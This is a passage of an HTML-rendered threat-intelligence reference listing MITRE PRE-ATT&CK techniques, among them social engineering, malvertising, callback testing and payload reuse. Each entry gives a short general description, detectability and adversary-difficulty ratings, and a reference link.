<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1151">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1151</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_identify_gap_areas_pre_t1002"><a class="anchor" href="#_identify_gap_areas_pre_t1002"></a><a class="link" href="#_identify_gap_areas_pre_t1002">Identify gap areas - PRE-T1002</a></h3>
<div class="paragraph">
<p>Leadership identifies gap areas that generate a compelling need to generate a Key Intelligence Topic (KIT) or Key Intelligence Question (KIQ). (Citation: ODNIIntegration) (Citation: ICD115)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Normal aspect of adversary planning lifecycle. May not be done by all adversaries.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1541. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1002">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1002</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_os_vendor_provided_communication_channels_pre_t1167"><a class="anchor" href="#_os_vendor_provided_communication_channels_pre_t1167"></a><a class="link" href="#_os_vendor_provided_communication_channels_pre_t1167">OS-vendor provided communication channels - PRE-T1167</a></h3>
<div class="paragraph">
<p>Google and Apple provide Google Cloud Messaging and Apple Push Notification Service, respectively, services designed to enable efficient communication between third-party mobile app backend servers and the mobile apps running on individual devices. These services maintain an encrypted connection between every mobile device and Google or Apple that cannot easily be inspected and must be allowed to traverse networks as part of normal device operation. These services could be used by adversaries for communication to compromised mobile devices. (Citation: Securelist Mobile Malware 2013) (Citation: DroydSeuss)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: These services are heavily utilized by mainstream mobile app developers. High volume of communications makes it extremely hard for a defender to distinguish between legitimate and adversary communications.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: These are free services provided by Google and Apple to app developers, and information on how to use them is readily available.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1542. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1167">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1167</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_identify_job_postings_and_needs_gaps_pre_t1055"><a class="anchor" href="#_identify_job_postings_and_needs_gaps_pre_t1055"></a><a class="link" href="#_identify_job_postings_and_needs_gaps_pre_t1055">Identify job postings and needs/gaps - PRE-T1055</a></h3>
<div class="paragraph">
<p>Job postings, on either company sites, or in other forums, provide information on organizational structure, needs, and gaps in an organization. This may give an adversary an indication of weakness in an organization (such as under-resourced IT shop). Job postings can also provide information on an organizations structure which could be valuable in social engineering attempts. (Citation: JobPostingThreat) (Citation: RSA-APTRecon)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Public source external to the defender&#8217;s organization.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Very public by design.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1543. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1055">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1055</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_conduct_social_engineering_pre_t1056"><a class="anchor" href="#_conduct_social_engineering_pre_t1056"></a><a class="link" href="#_conduct_social_engineering_pre_t1056">Conduct social engineering - PRE-T1056</a></h3>
<div class="paragraph">
<p>Social Engineering is the practice of manipulating people in order to get them to divulge information or take an action. (Citation: SEAttackVectors) (Citation: BeachSE2003)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: No technical means to detect an adversary collecting information about a target. Any detection would be based upon strong OPSEC policy implementation.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Very effective technique for the adversary that does not require any formal training and relies upon finding just one person who exhibits poor judgement.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1544. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1056">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1056</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_identify_supply_chains_pre_t1053"><a class="anchor" href="#_identify_supply_chains_pre_t1053"></a><a class="link" href="#_identify_supply_chains_pre_t1053">Identify supply chains - PRE-T1053</a></h3>
<div class="paragraph">
<p>Supply chains include the people, processes, and technologies used to move a product or service from a supplier to a consumer. Understanding supply chains may provide an adversary with opportunities to exploit organizational relationships. (Citation: SmithSupplyChain) (Citation: CERT-UKSupplyChain)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Searching publicly available sources that cannot be monitored by a defender.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: No</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Requires an intensive process. May be easier in certain industries where there are a limited number of suppliers (e.g., SCADA).</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1545. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1053">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1053</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_identify_analyst_level_gaps_pre_t1010"><a class="anchor" href="#_identify_analyst_level_gaps_pre_t1010"></a><a class="link" href="#_identify_analyst_level_gaps_pre_t1010">Identify analyst level gaps - PRE-T1010</a></h3>
<div class="paragraph">
<p>Analysts identify gap areas that generate a compelling need to generate a Key Intelligence Topic (KIT) or Key Intelligence Question (KIQ). (Citation: BrighthubGapAnalysis) (Citation: ICD115) (Citation: JP2-01)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Normal aspect of adversary planning lifecycle. May not be done by all adversaries.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1546. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1010">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1010</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_compromise_3rd_party_infrastructure_to_support_delivery_pre_t1111"><a class="anchor" href="#_compromise_3rd_party_infrastructure_to_support_delivery_pre_t1111"></a><a class="link" href="#_compromise_3rd_party_infrastructure_to_support_delivery_pre_t1111">Compromise 3rd party infrastructure to support delivery - PRE-T1111</a></h3>
<div class="paragraph">
<p>Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it for some or all of the attack cycle. (Citation: WateringHole2014) (Citation: Operation SnowMan)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Defender will not have visibility on 3rd party sites unless target is successfully enticed to visit one.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Commonly used technique currently (e.g., [<a href="https://www.wordpress.com" class="bare">https://www.wordpress.com</a> WordPress] sites) as precursor activity to launching attack against intended target (e.g., acquiring botnet or layers of proxies for reducing attribution possibilities).</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1547. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1111">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1111</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_obfuscate_infrastructure_pre_t1086"><a class="anchor" href="#_obfuscate_infrastructure_pre_t1086"></a><a class="link" href="#_obfuscate_infrastructure_pre_t1086">Obfuscate infrastructure - PRE-T1086</a></h3>
<div class="paragraph">
<p>Obfuscation is hiding the day-to-day building and testing of new tools, chat servers, etc. (Citation: LUCKYCAT2012)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: Yes</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Difficult, but defender is well aware of technique and attempts to find discrepancies.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Adversary has a variety of solutions, ranging in difficulty, that can be employed (e.g., BGP hijacking, tunneling, reflection, multi-hop, etc.)
Adversary can also use misattributable credentials to obtain servers, build environment, [<a href="https://aws.amazon.com" class="bare">https://aws.amazon.com</a> Amazon Web Services] (AWS) accounts, etc.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1548. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1086">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1086</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_deploy_exploit_using_advertising_pre_t1157"><a class="anchor" href="#_deploy_exploit_using_advertising_pre_t1157"></a><a class="link" href="#_deploy_exploit_using_advertising_pre_t1157">Deploy exploit using advertising - PRE-T1157</a></h3>
<div class="paragraph">
<p>Exploits spread through advertising (malvertising) involve injecting malicious or malware-laden advertisements into legitimate online advertising networks and webpages. (Citation: TPMalvertising)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Although some commercial technologies are being advertised which claim to detect malvertising, it largely spreads unknowingly because it doesn&#8217;t always require an action by a user.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: An adversary can deploy exploits via malvertising using multiple mechanisms. Such mechanisms include an image ad that is infected, redirection, or using social engineering to get the end user to install the malicious software themselves.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1549. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1157">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1157</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_map_network_topology_pre_t1029"><a class="anchor" href="#_map_network_topology_pre_t1029"></a><a class="link" href="#_map_network_topology_pre_t1029">Map network topology - PRE-T1029</a></h3>
<div class="paragraph">
<p>A network topology is the arrangement of the various elements of a network (e.g., servers, workstations, printers, routers, firewalls, etc.). Mapping a network allows an adversary to understand how the elements are connected or related. (Citation: man traceroute) (Citation: Shodan Tutorial)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: Yes</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Network mapping techniques/tools typically generate benign traffic that does not require further investigation by a defender since there is no actionable defense to execute. Defender review of access logs may provide some insight based on trends or patterns.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Various available tools and data sources for scouting and detecting network topologies.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1550. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1029">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1029</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_obfuscation_or_cryptography_pre_t1090"><a class="anchor" href="#_obfuscation_or_cryptography_pre_t1090"></a><a class="link" href="#_obfuscation_or_cryptography_pre_t1090">Obfuscation or cryptography - PRE-T1090</a></h3>
<div class="paragraph">
<p>Obfuscation is the act of creating communications that are more difficult to understand. Encryption transforms the communications such that it requires a key to reverse the encryption. (Citation: FireEyeAPT28)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Techniques and signatures are hard to detect. Advanced communications and exfiltration channels are nearly indistinguishable from background noise.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Known approaches include the use of cryptography for communications, rotating drops sites (such as random list of chat fora), and one-time [<a href="https://aws.amazon.com/s3/" class="bare">https://aws.amazon.com/s3/</a> Simple Storage Service (S3)] buckets, etc. All require sophisticated knowledge, infrastructure, and funding.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1551. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1090">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1090</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_choose_pre_compromised_mobile_app_developer_account_credentials_or_signing_keys_pre_t1168"><a class="anchor" href="#_choose_pre_compromised_mobile_app_developer_account_credentials_or_signing_keys_pre_t1168"></a><a class="link" href="#_choose_pre_compromised_mobile_app_developer_account_credentials_or_signing_keys_pre_t1168">Choose pre-compromised mobile app developer account credentials or signing keys - PRE-T1168</a></h3>
<div class="paragraph">
<p>The adversary can use account credentials or signing keys of an existing mobile app developer to publish malicious updates of existing mobile apps to an application store, or to abuse the developer&#8217;s identity and reputation to publish new malicious apps. Many mobile devices are configured to automatically install new versions of already-installed apps. (Citation: Fraudenlent Apps Stolen Dev Credentials)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Possible to detect compromised credentials if alerting from a service provider is enabled and acted upon by the individual.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: No</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: The difficulty of obtaining useful developer credentials may vary. Well-organized, professional app developers whose credentials or signing keys would be the most useful to an adversary because of the large install bases of their apps, would likely strongly protect their credentials and signing keys. Less-organized app developers may not protect their credentials and signing keys as strongly, but the credentials and signing keys would also be less useful to an adversary. These less-organized app developers may reuse passwords across sites, fail to turn on multi-factor authentication features when available, or store signing keys in unprotected locations.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1552. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1168">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1168</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_spear_phishing_messages_with_text_only_pre_t1145"><a class="anchor" href="#_spear_phishing_messages_with_text_only_pre_t1145"></a><a class="link" href="#_spear_phishing_messages_with_text_only_pre_t1145">Spear phishing messages with text only - PRE-T1145</a></h3>
<div class="paragraph">
<p>Emails with text only phishing messages do not contain any attachments or links to websites. They are designed to get a user to take a follow on action such as calling a phone number or wiring money. They can also be used to elicit an email response to confirm existence of an account or user. (Citation: Paypal Phone Scam)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: End user training and awareness is the primary defense for flagging a plain text email so the end user does not respond or take any requested action (e.g., calling a designated number).</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Sending messages with text only should be accepted in most cases (e.g., not being filtered based on source, content).</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1553. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1145">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1145</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_test_callback_functionality_pre_t1133"><a class="anchor" href="#_test_callback_functionality_pre_t1133"></a><a class="link" href="#_test_callback_functionality_pre_t1133">Test callback functionality - PRE-T1133</a></h3>
<div class="paragraph">
<p>Callbacks are malware communications seeking instructions. An adversary will test their malware to ensure the appropriate instructions are conveyed and the callback software can be reached. (Citation: LeeBeaconing)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Adversary controls the test and defender likely has no visibility.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Adversary controls or acquires all pieces of infrastructure and can test outside of defender&#8217;s visibility.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1554. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1133">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1133</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mine_technical_blogs_forums_pre_t1034"><a class="anchor" href="#_mine_technical_blogs_forums_pre_t1034"></a><a class="link" href="#_mine_technical_blogs_forums_pre_t1034">Mine technical blogs/forums - PRE-T1034</a></h3>
<div class="paragraph">
<p>Technical blogs and forums provide a way for technical staff to ask for assistance or troubleshoot problems. In doing so they may reveal information such as operating system (OS), network devices, or applications in use. (Citation: FunAndSun2012)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Cannot detect access to public sites.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Success is dependent upon the existence of detailed technical specifications for target network posted in blogs/forums. Poor OPSEC practices result in an adversary gleaning a lot of sensitive information about configurations and/or issues encountered.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1555. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1034">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1034</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_automated_system_performs_requested_action_pre_t1161"><a class="anchor" href="#_automated_system_performs_requested_action_pre_t1161"></a><a class="link" href="#_automated_system_performs_requested_action_pre_t1161">Automated system performs requested action - PRE-T1161</a></h3>
<div class="paragraph">
<p>Users may be performing legitimate activity but using media that is compromised (e.g., using a USB drive that comes with malware installed during manufacture or supply). Upon insertion in the system the media auto-runs and the malware executes without further action by the user. (Citation: WSUSpect2015)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Environments without extensive endpoint sensing capabilities do not typically collect this level of detailed information.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Autoruns with USB keys and CDs traditionally were always on (e.g., [<a href="http://windows.microsoft.com" class="bare">http://windows.microsoft.com</a> Windows] 7 is now an exception with a new policy of limiting the always on nature of Autoruns), ensuring and automated system completes a requested action. Specialized use cases exist where automated systems are specifically designed against automatically performing certain actions (e.g., USB/CD insertion and automatically running is disabled in certain environments).</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1556. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1161">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1161</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_obtain_re_use_payloads_pre_t1123"><a class="anchor" href="#_obtain_re_use_payloads_pre_t1123"></a><a class="link" href="#_obtain_re_use_payloads_pre_t1123">Obtain/re-use payloads - PRE-T1123</a></h3>
<div class="paragraph">
<p>A payload is the part of the malware which performs a malicious action. The adversary may re-use payloads when the needed capability is already available. (Citation: SonyDestover)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Adversary will likely use code repositories, but detecting an adversary acquiring a payload would require the defender to be monitoring the code repository where the payload is stored. If the adversary re-uses payloads, this allows the defender to create signatures to detect using these known indicators of compromise (e.g., hashes).</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Several exploit repositories and tool suites exist for re-use and tailoring.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1557. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1123">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1123</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_conduct_passive_scanning_pre_t1030"><a class="anchor" href="#_conduct_passive_scanning_pre_t1030"></a><a class="link" href="#_conduct_passive_scanning_pre_t1030">Conduct passive scanning - PRE-T1030</a></h3>
<div class="paragraph">
<p>Passive scanning is the act of looking at existing network traffic in order to identify information about the communications system. (Citation: SurveyDetectionStrategies) (Citation: CyberReconPaper)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Generates no network traffic that would enable detection.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Easy to do but it requires a vantage point conducive to accessing this data.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1558. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1030">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1030</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_analyze_social_and_business_relationships_interests_and_affiliations_pre_t1072"><a class="anchor" href="#_analyze_social_and_business_relationships_interests_and_affiliations_pre_t1072"></a><a class="link" href="#_analyze_social_and_business_relationships_interests_and_affiliations_pre_t1072">Analyze social and business relationships, interests, and affiliations - PRE-T1072</a></h3>
<div class="paragraph">
<p>Social media provides insight into the target&#8217;s affiliations with groups and organizations. Certification information can explain their technical associations and professional associations. Personal information can provide data for exploitation or even blackmail. (Citation: Scasny2015)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Public sources are external to the defender&#8217;s organization. Some social media sites have an option to show you when users are looking at your profile, but an adversary can evade this tracking depending on how they conduct the searches.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Social and business relationship information for an individual can be found by examining their social media contacts (e.g., [<a href="https://www.facebook.com" class="bare">https://www.facebook.com</a> Facebook] and [<a href="https://www.linkedin.com" class="bare">https://www.linkedin.com</a> LinkedIn]). Social media also provides insight into the target&#8217;s affiliations with groups and organizations. Finally, certification information can explain their technical associations and professional associations.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1559. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1072">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1072</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_network_based_hiding_techniques_pre_t1092"><a class="anchor" href="#_network_based_hiding_techniques_pre_t1092"></a><a class="link" href="#_network_based_hiding_techniques_pre_t1092">Network-based hiding techniques - PRE-T1092</a></h3>
<div class="paragraph">
<p>Technical network hiding techniques are methods of modifying traffic to evade network signature detection or to utilize misattribution techniques. Examples include channel/IP/VLAN hopping, mimicking legitimate operations, or seeding with misinformation. (Citation: HAMMERTOSS2015)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: Yes</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Unless defender is dissecting protocols or performing network signature analysis on any protocol deviations/patterns, this technique is largely undetected.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: No</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Some of the hiding techniques require special accesses (network, proximity, physical, etc.) and/or may rely on knowledge of how the defender operates and/or awareness on what visibility the defender has and how it is obtained</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1560. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1092">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1092</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_friend_follow_connect_to_targets_of_interest_pre_t1121"><a class="anchor" href="#_friend_follow_connect_to_targets_of_interest_pre_t1121"></a><a class="link" href="#_friend_follow_connect_to_targets_of_interest_pre_t1121">Friend/Follow/Connect to targets of interest - PRE-T1121</a></h3>
<div class="paragraph">
